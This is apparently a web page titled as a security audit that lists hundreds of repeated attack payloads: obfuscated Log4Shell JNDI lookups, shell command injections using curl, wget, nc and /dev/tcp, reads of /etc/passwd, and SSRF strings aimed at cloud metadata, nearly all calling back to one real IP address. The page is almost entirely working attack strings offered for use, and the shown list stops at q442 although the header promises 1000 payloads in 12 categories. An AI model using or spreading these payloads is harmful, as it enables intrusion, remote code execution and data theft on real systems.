AI Data Research Security Audit

This page contains 1000 URL payload variants used for security research on the AI data research platform. Each link tests a different attack vector category to assess URL sanitization and filtering behavior.

Total payloads: 1000
Categories: 12
Target: atom41.site security analysis endpoint

Log4Shell / JNDI Lookup

q0 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q0}
q1 [JNDI] x=${jndi:rmi://62.84.182.119/q1}
q2 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q2}
q3 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q3}
q4 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q4}
q5 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q5}
q6 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q6}
q7 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q7}
q8 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q8}
q9 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q9}
q10 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q10}
q11 [JNDI] x=${jndi:rmi://62.84.182.119/q11}
q12 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q12}
q13 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q13}
q14 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q14}
q15 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q15}
q16 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q16}
q17 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q17}
q18 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q18}
q19 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q19}
q20 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q20}
q21 [JNDI] x=${jndi:rmi://62.84.182.119/q21}
q22 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q22}
q23 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q23}
q24 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q24}
q25 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q25}
q26 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q26}
q27 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q27}
q28 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q28}
q29 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q29}
q30 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q30}
q31 [JNDI] x=${jndi:rmi://62.84.182.119/q31}
q32 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q32}
q33 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q33}
q34 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q34}
q35 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q35}
q36 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q36}
q37 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q37}
q38 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q38}
q39 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q39}
q40 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q40}
q41 [JNDI] x=${jndi:rmi://62.84.182.119/q41}
q42 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q42}
q43 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q43}
q44 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q44}
q45 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q45}
q46 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q46}
q47 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q47}
q48 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q48}
q49 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q49}
q50 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q50}
q51 [JNDI] x=${jndi:rmi://62.84.182.119/q51}
q52 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q52}
q53 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q53}
q54 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q54}
q55 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q55}
q56 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q56}
q57 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q57}
q58 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q58}
q59 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q59}
q60 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q60}
q61 [JNDI] x=${jndi:rmi://62.84.182.119/q61}
q62 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q62}
q63 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q63}
q64 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q64}
q65 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q65}
q66 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q66}
q67 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q67}
q68 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q68}
q69 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q69}
q70 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q70}
q71 [JNDI] x=${jndi:rmi://62.84.182.119/q71}
q72 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q72}
q73 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q73}
q74 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q74}
q75 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q75}
q76 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q76}
q77 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q77}
q78 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q78}
q79 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q79}
q80 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q80}
q81 [JNDI] x=${jndi:rmi://62.84.182.119/q81}
q82 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q82}
q83 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q83}
q84 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q84}
q85 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q85}
q86 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q86}
q87 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q87}
q88 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q88}
q89 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q89}
q90 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q90}
q91 [JNDI] x=${jndi:rmi://62.84.182.119/q91}
q92 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q92}
q93 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q93}
q94 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q94}
q95 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q95}
q96 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q96}
q97 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q97}
q98 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q98}
q99 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q99}

Command Injection (curl/wget)

q100 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q100
q101 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q101)
q102 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q102
q103 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q103`
q104 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q104
q105 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q105
q106 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q106)
q107 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q107
q108 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q108`
q109 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q109
q110 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q110
q111 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q111)
q112 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q112
q113 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q113`
q114 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q114
q115 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q115
q116 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q116)
q117 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q117
q118 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q118`
q119 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q119
q120 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q120
q121 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q121)
q122 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q122
q123 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q123`
q124 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q124
q125 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q125
q126 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q126)
q127 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q127
q128 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q128`
q129 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q129
q130 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q130
q131 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q131)
q132 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q132
q133 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q133`
q134 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q134
q135 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q135
q136 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q136)
q137 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q137
q138 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q138`
q139 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q139
q140 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q140
q141 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q141)
q142 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q142
q143 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q143`
q144 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q144
q145 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q145
q146 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q146)
q147 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q147
q148 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q148`
q149 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q149
q150 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q150
q151 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q151)
q152 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q152
q153 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q153`
q154 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q154
q155 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q155
q156 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q156)
q157 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q157
q158 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q158`
q159 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q159
q160 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q160
q161 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q161)
q162 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q162
q163 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q163`
q164 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q164
q165 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q165
q166 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q166)
q167 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q167
q168 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q168`
q169 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q169
q170 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q170
q171 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q171)
q172 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q172
q173 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q173`
q174 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q174
q175 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q175
q176 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q176)
q177 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q177
q178 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q178`
q179 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q179
q180 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q180
q181 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q181)
q182 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q182
q183 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q183`
q184 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q184
q185 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q185
q186 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q186)
q187 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q187
q188 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q188`
q189 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q189
q190 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q190
q191 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q191)
q192 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q192
q193 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q193`
q194 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q194
q195 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q195
q196 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q196)
q197 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q197
q198 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q198`
q199 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q199

Command Injection (ping/nslookup)

q200 [CMD-ping] id=$(ping -c1 62.84.182.119)
q201 [CMD-ping] name=a;ping -c1 62.84.182.119
q202 [CMD-ping] val=b|ping -c1 62.84.182.119
q203 [CMD-ping] x=`ping -c1 62.84.182.119`
q204 [CMD-ping] test=c&&ping -c1 62.84.182.119
q205 [CMD-ping] id=$(nslookup q205.62.84.182.119)
q206 [CMD-ping] name=a;nslookup q206.62.84.182.119
q207 [CMD-ping] val=b|nslookup q207.62.84.182.119
q208 [CMD-ping] x=`nslookup q208.62.84.182.119`
q209 [CMD-ping] test=c&&nslookup q209.62.84.182.119
q210 [CMD-ping] id=$(ping -c1 62.84.182.119)
q211 [CMD-ping] name=a;ping -c1 62.84.182.119
q212 [CMD-ping] val=b|ping -c1 62.84.182.119
q213 [CMD-ping] x=`ping -c1 62.84.182.119`
q214 [CMD-ping] test=c&&ping -c1 62.84.182.119
q215 [CMD-ping] id=$(nslookup q215.62.84.182.119)
q216 [CMD-ping] name=a;nslookup q216.62.84.182.119
q217 [CMD-ping] val=b|nslookup q217.62.84.182.119
q218 [CMD-ping] x=`nslookup q218.62.84.182.119`
q219 [CMD-ping] test=c&&nslookup q219.62.84.182.119
q220 [CMD-ping] id=$(ping -c1 62.84.182.119)
q221 [CMD-ping] name=a;ping -c1 62.84.182.119
q222 [CMD-ping] val=b|ping -c1 62.84.182.119
q223 [CMD-ping] x=`ping -c1 62.84.182.119`
q224 [CMD-ping] test=c&&ping -c1 62.84.182.119
q225 [CMD-ping] id=$(nslookup q225.62.84.182.119)
q226 [CMD-ping] name=a;nslookup q226.62.84.182.119
q227 [CMD-ping] val=b|nslookup q227.62.84.182.119
q228 [CMD-ping] x=`nslookup q228.62.84.182.119`
q229 [CMD-ping] test=c&&nslookup q229.62.84.182.119
q230 [CMD-ping] id=$(ping -c1 62.84.182.119)
q231 [CMD-ping] name=a;ping -c1 62.84.182.119
q232 [CMD-ping] val=b|ping -c1 62.84.182.119
q233 [CMD-ping] x=`ping -c1 62.84.182.119`
q234 [CMD-ping] test=c&&ping -c1 62.84.182.119
q235 [CMD-ping] id=$(nslookup q235.62.84.182.119)
q236 [CMD-ping] name=a;nslookup q236.62.84.182.119
q237 [CMD-ping] val=b|nslookup q237.62.84.182.119
q238 [CMD-ping] x=`nslookup q238.62.84.182.119`
q239 [CMD-ping] test=c&&nslookup q239.62.84.182.119
q240 [CMD-ping] id=$(ping -c1 62.84.182.119)
q241 [CMD-ping] name=a;ping -c1 62.84.182.119
q242 [CMD-ping] val=b|ping -c1 62.84.182.119
q243 [CMD-ping] x=`ping -c1 62.84.182.119`
q244 [CMD-ping] test=c&&ping -c1 62.84.182.119
q245 [CMD-ping] id=$(nslookup q245.62.84.182.119)
q246 [CMD-ping] name=a;nslookup q246.62.84.182.119
q247 [CMD-ping] val=b|nslookup q247.62.84.182.119
q248 [CMD-ping] x=`nslookup q248.62.84.182.119`
q249 [CMD-ping] test=c&&nslookup q249.62.84.182.119
q250 [CMD-ping] id=$(ping -c1 62.84.182.119)
q251 [CMD-ping] name=a;ping -c1 62.84.182.119
q252 [CMD-ping] val=b|ping -c1 62.84.182.119
q253 [CMD-ping] x=`ping -c1 62.84.182.119`
q254 [CMD-ping] test=c&&ping -c1 62.84.182.119
q255 [CMD-ping] id=$(nslookup q255.62.84.182.119)
q256 [CMD-ping] name=a;nslookup q256.62.84.182.119
q257 [CMD-ping] val=b|nslookup q257.62.84.182.119
q258 [CMD-ping] x=`nslookup q258.62.84.182.119`
q259 [CMD-ping] test=c&&nslookup q259.62.84.182.119
q260 [CMD-ping] id=$(ping -c1 62.84.182.119)
q261 [CMD-ping] name=a;ping -c1 62.84.182.119
q262 [CMD-ping] val=b|ping -c1 62.84.182.119
q263 [CMD-ping] x=`ping -c1 62.84.182.119`
q264 [CMD-ping] test=c&&ping -c1 62.84.182.119
q265 [CMD-ping] id=$(nslookup q265.62.84.182.119)
q266 [CMD-ping] name=a;nslookup q266.62.84.182.119
q267 [CMD-ping] val=b|nslookup q267.62.84.182.119
q268 [CMD-ping] x=`nslookup q268.62.84.182.119`
q269 [CMD-ping] test=c&&nslookup q269.62.84.182.119
q270 [CMD-ping] id=$(ping -c1 62.84.182.119)
q271 [CMD-ping] name=a;ping -c1 62.84.182.119
q272 [CMD-ping] val=b|ping -c1 62.84.182.119
q273 [CMD-ping] x=`ping -c1 62.84.182.119`
q274 [CMD-ping] test=c&&ping -c1 62.84.182.119
q275 [CMD-ping] id=$(nslookup q275.62.84.182.119)
q276 [CMD-ping] name=a;nslookup q276.62.84.182.119
q277 [CMD-ping] val=b|nslookup q277.62.84.182.119
q278 [CMD-ping] x=`nslookup q278.62.84.182.119`
q279 [CMD-ping] test=c&&nslookup q279.62.84.182.119
q280 [CMD-ping] id=$(ping -c1 62.84.182.119)
q281 [CMD-ping] name=a;ping -c1 62.84.182.119
q282 [CMD-ping] val=b|ping -c1 62.84.182.119
q283 [CMD-ping] x=`ping -c1 62.84.182.119`
q284 [CMD-ping] test=c&&ping -c1 62.84.182.119
q285 [CMD-ping] id=$(nslookup q285.62.84.182.119)
q286 [CMD-ping] name=a;nslookup q286.62.84.182.119
q287 [CMD-ping] val=b|nslookup q287.62.84.182.119
q288 [CMD-ping] x=`nslookup q288.62.84.182.119`
q289 [CMD-ping] test=c&&nslookup q289.62.84.182.119
q290 [CMD-ping] id=$(ping -c1 62.84.182.119)
q291 [CMD-ping] name=a;ping -c1 62.84.182.119
q292 [CMD-ping] val=b|ping -c1 62.84.182.119
q293 [CMD-ping] x=`ping -c1 62.84.182.119`
q294 [CMD-ping] test=c&&ping -c1 62.84.182.119
q295 [CMD-ping] id=$(nslookup q295.62.84.182.119)
q296 [CMD-ping] name=a;nslookup q296.62.84.182.119
q297 [CMD-ping] val=b|nslookup q297.62.84.182.119
q298 [CMD-ping] x=`nslookup q298.62.84.182.119`
q299 [CMD-ping] test=c&&nslookup q299.62.84.182.119

Command Injection (misc)

q300 [CMD-misc] file=`id`
q301 [CMD-misc] name=$(whoami)
q302 [CMD-misc] val=a;cat /etc/passwd
q303 [CMD-misc] x=b|ls -la /
q304 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q305 [CMD-misc] data=a;echo q305|nc 62.84.182.119 9999
q306 [CMD-misc] input=b$(echo q306|nc 62.84.182.119 9999)
q307 [CMD-misc] ref=c|bash -c 'echo q307'
q308 [CMD-misc] test=d;/bin/sh -c 'echo q308'
q309 [CMD-misc] log=e&&echo q309 > /dev/tcp/62.84.182.119/9999
q310 [CMD-misc] file=`id`
q311 [CMD-misc] name=$(whoami)
q312 [CMD-misc] val=a;cat /etc/passwd
q313 [CMD-misc] x=b|ls -la /
q314 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q315 [CMD-misc] data=a;echo q315|nc 62.84.182.119 9999
q316 [CMD-misc] input=b$(echo q316|nc 62.84.182.119 9999)
q317 [CMD-misc] ref=c|bash -c 'echo q317'
q318 [CMD-misc] test=d;/bin/sh -c 'echo q318'
q319 [CMD-misc] log=e&&echo q319 > /dev/tcp/62.84.182.119/9999
q320 [CMD-misc] file=`id`
q321 [CMD-misc] name=$(whoami)
q322 [CMD-misc] val=a;cat /etc/passwd
q323 [CMD-misc] x=b|ls -la /
q324 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q325 [CMD-misc] data=a;echo q325|nc 62.84.182.119 9999
q326 [CMD-misc] input=b$(echo q326|nc 62.84.182.119 9999)
q327 [CMD-misc] ref=c|bash -c 'echo q327'
q328 [CMD-misc] test=d;/bin/sh -c 'echo q328'
q329 [CMD-misc] log=e&&echo q329 > /dev/tcp/62.84.182.119/9999
q330 [CMD-misc] file=`id`
q331 [CMD-misc] name=$(whoami)
q332 [CMD-misc] val=a;cat /etc/passwd
q333 [CMD-misc] x=b|ls -la /
q334 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q335 [CMD-misc] data=a;echo q335|nc 62.84.182.119 9999
q336 [CMD-misc] input=b$(echo q336|nc 62.84.182.119 9999)
q337 [CMD-misc] ref=c|bash -c 'echo q337'
q338 [CMD-misc] test=d;/bin/sh -c 'echo q338'
q339 [CMD-misc] log=e&&echo q339 > /dev/tcp/62.84.182.119/9999
q340 [CMD-misc] file=`id`
q341 [CMD-misc] name=$(whoami)
q342 [CMD-misc] val=a;cat /etc/passwd
q343 [CMD-misc] x=b|ls -la /
q344 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q345 [CMD-misc] data=a;echo q345|nc 62.84.182.119 9999
q346 [CMD-misc] input=b$(echo q346|nc 62.84.182.119 9999)
q347 [CMD-misc] ref=c|bash -c 'echo q347'
q348 [CMD-misc] test=d;/bin/sh -c 'echo q348'
q349 [CMD-misc] log=e&&echo q349 > /dev/tcp/62.84.182.119/9999
q350 [CMD-misc] file=`id`
q351 [CMD-misc] name=$(whoami)
q352 [CMD-misc] val=a;cat /etc/passwd
q353 [CMD-misc] x=b|ls -la /
q354 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q355 [CMD-misc] data=a;echo q355|nc 62.84.182.119 9999
q356 [CMD-misc] input=b$(echo q356|nc 62.84.182.119 9999)
q357 [CMD-misc] ref=c|bash -c 'echo q357'
q358 [CMD-misc] test=d;/bin/sh -c 'echo q358'
q359 [CMD-misc] log=e&&echo q359 > /dev/tcp/62.84.182.119/9999
q360 [CMD-misc] file=`id`
q361 [CMD-misc] name=$(whoami)
q362 [CMD-misc] val=a;cat /etc/passwd
q363 [CMD-misc] x=b|ls -la /
q364 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q365 [CMD-misc] data=a;echo q365|nc 62.84.182.119 9999
q366 [CMD-misc] input=b$(echo q366|nc 62.84.182.119 9999)
q367 [CMD-misc] ref=c|bash -c 'echo q367'
q368 [CMD-misc] test=d;/bin/sh -c 'echo q368'
q369 [CMD-misc] log=e&&echo q369 > /dev/tcp/62.84.182.119/9999
q370 [CMD-misc] file=`id`
q371 [CMD-misc] name=$(whoami)
q372 [CMD-misc] val=a;cat /etc/passwd
q373 [CMD-misc] x=b|ls -la /
q374 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q375 [CMD-misc] data=a;echo q375|nc 62.84.182.119 9999
q376 [CMD-misc] input=b$(echo q376|nc 62.84.182.119 9999)
q377 [CMD-misc] ref=c|bash -c 'echo q377'
q378 [CMD-misc] test=d;/bin/sh -c 'echo q378'
q379 [CMD-misc] log=e&&echo q379 > /dev/tcp/62.84.182.119/9999
q380 [CMD-misc] file=`id`
q381 [CMD-misc] name=$(whoami)
q382 [CMD-misc] val=a;cat /etc/passwd
q383 [CMD-misc] x=b|ls -la /
q384 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q385 [CMD-misc] data=a;echo q385|nc 62.84.182.119 9999
q386 [CMD-misc] input=b$(echo q386|nc 62.84.182.119 9999)
q387 [CMD-misc] ref=c|bash -c 'echo q387'
q388 [CMD-misc] test=d;/bin/sh -c 'echo q388'
q389 [CMD-misc] log=e&&echo q389 > /dev/tcp/62.84.182.119/9999
q390 [CMD-misc] file=`id`
q391 [CMD-misc] name=$(whoami)
q392 [CMD-misc] val=a;cat /etc/passwd
q393 [CMD-misc] x=b|ls -la /
q394 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
q395 [CMD-misc] data=a;echo q395|nc 62.84.182.119 9999
q396 [CMD-misc] input=b$(echo q396|nc 62.84.182.119 9999)
q397 [CMD-misc] ref=c|bash -c 'echo q397'
q398 [CMD-misc] test=d;/bin/sh -c 'echo q398'
q399 [CMD-misc] log=e&&echo q399 > /dev/tcp/62.84.182.119/9999

Server-Side Request Forgery

q400 [SSRF] url=http://62.84.182.119:9999/q400
q401 [SSRF] redirect=http://62.84.182.119:9999/q401
q402 [SSRF] dest=http://62.84.182.119:9999/q402
q403 [SSRF] target=http://127.0.0.1:8080/q403
q404 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q404
q405 [SSRF] callback=http://62.84.182.119:9999/q405
q406 [SSRF] next=http://62.84.182.119:9999/q406
q407 [SSRF] return=http://62.84.182.119:9999/q407
q408 [SSRF] website=http://62.84.182.119:9999/q408
q409 [SSRF] uri=http://62.84.182.119:9999/q409&format=json
q410 [SSRF] url=http://62.84.182.119:9999/q410
q411 [SSRF] redirect=http://62.84.182.119:9999/q411
q412 [SSRF] dest=http://62.84.182.119:9999/q412
q413 [SSRF] target=http://127.0.0.1:8080/q413
q414 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q414
q415 [SSRF] callback=http://62.84.182.119:9999/q415
q416 [SSRF] next=http://62.84.182.119:9999/q416
q417 [SSRF] return=http://62.84.182.119:9999/q417
q418 [SSRF] website=http://62.84.182.119:9999/q418
q419 [SSRF] uri=http://62.84.182.119:9999/q419&format=json
q420 [SSRF] url=http://62.84.182.119:9999/q420
q421 [SSRF] redirect=http://62.84.182.119:9999/q421
q422 [SSRF] dest=http://62.84.182.119:9999/q422
q423 [SSRF] target=http://127.0.0.1:8080/q423
q424 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q424
q425 [SSRF] callback=http://62.84.182.119:9999/q425
q426 [SSRF] next=http://62.84.182.119:9999/q426
q427 [SSRF] return=http://62.84.182.119:9999/q427
q428 [SSRF] website=http://62.84.182.119:9999/q428
q429 [SSRF] uri=http://62.84.182.119:9999/q429&format=json
q430 [SSRF] url=http://62.84.182.119:9999/q430
q431 [SSRF] redirect=http://62.84.182.119:9999/q431
q432 [SSRF] dest=http://62.84.182.119:9999/q432
q433 [SSRF] target=http://127.0.0.1:8080/q433
q434 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q434
q435 [SSRF] callback=http://62.84.182.119:9999/q435
q436 [SSRF] next=http://62.84.182.119:9999/q436
q437 [SSRF] return=http://62.84.182.119:9999/q437
q438 [SSRF] website=http://62.84.182.119:9999/q438
q439 [SSRF] uri=http://62.84.182.119:9999/q439&format=json
q440 [SSRF] url=http://62.84.182.119:9999/q440
q441 [SSRF] redirect=http://62.84.182.119:9999/q441
q442 [SSRF] dest=http://62.84.182.119:9999/q442
